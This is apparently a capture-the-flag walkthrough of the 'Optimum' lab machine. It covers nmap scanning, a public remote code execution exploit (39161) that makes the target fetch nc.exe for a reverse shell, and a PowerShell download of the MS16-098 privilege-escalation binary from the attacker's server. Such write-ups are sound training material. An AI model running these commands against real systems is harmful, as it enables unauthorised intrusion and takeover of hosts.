Skip to content

Optimum // Windows // Beginner

created by ch4p // 10.10.10.8

// Enumeration //

As always, we’ll start with our initial scans. Generally I do a full port scan, but to save a bit of time, I’m just going to do the top 1024 for this particular machine. Hint – There isn’t much.

nmap -Pn -A -p 1-1024 -v 10.10.10.8 -oG /home/rp/Desktop/Optimum/nmap

There’s only one service, Http, and it’s hosting a file server. Let’s do a quick Google search and see if anything turns up.

First two results are public vulnerabilities allowing RCE. Seems like a likely path for us to follow. Let’s hit up searchsploit, and grab the first one to our desktop.

searchsploit -m 39161

The script is URL encoded, however, the basic summary of it will be a 3 step process. We launch the exploit, it causes the target machine to reach back to, where we are serving NC.exe on a http server. It will download nc, and then execute it with the IP and Port hardcoded into the script. We’ll be listening on our Kali machine on that port, and ideally, we’ll get a shell back. Ensure your http server and netcat listener are both running prior to executing the script. The following commands are in order. Separate code blocks denote separate tabs.

locate nc.exe
cp /usr/share/windows-resources/binaries/nc.exe ~/Desktop/nc.exe
sudo python -m http.server 80
nc -lvnp 2901
sed -i 's/\r//g' 39161.py
./39161.py 10.10.10.8 80

Huzzah, we have user shell. We can go ahead and grab his flag from here, and then it’s time to escalate.

// Privilege Escalation //

Let’s start this off with a bit of situational awareness, find out what kind of environment we’re working in. The systeminfo command is good for alot of info at a glance, and after running it, we can dial in a bit more on our approach. After grabbing all that info and jotting it in my notes (I recommend cherrytree), I’m going to go ahead and start downloading some tools to make my job easier. Let’s use Windows Exploit suggester, it’s semi unreliable, but should work for this machine.

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.23:80/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"

Copy the system info back to our attacker machine, and let’s run it against Windows Exploit suggester. Put the text file with the system info in the same directory as your WES.

./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2020-07-06-mssb.xls --systeminfo Opt.txt
And we get back just a whole lot of stuff (Theres more..)

So we shouldn’t have any issues getting root. The exploit we’re going to focus on is an Integer Overflow, MS16-098. We can download a per-compiled version from github, and then use our same HTTP server to upload it.
On your attacker machine:

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

And then from the exploited machine:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.23:80/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"
We Execute the program and get root. Now for the flags.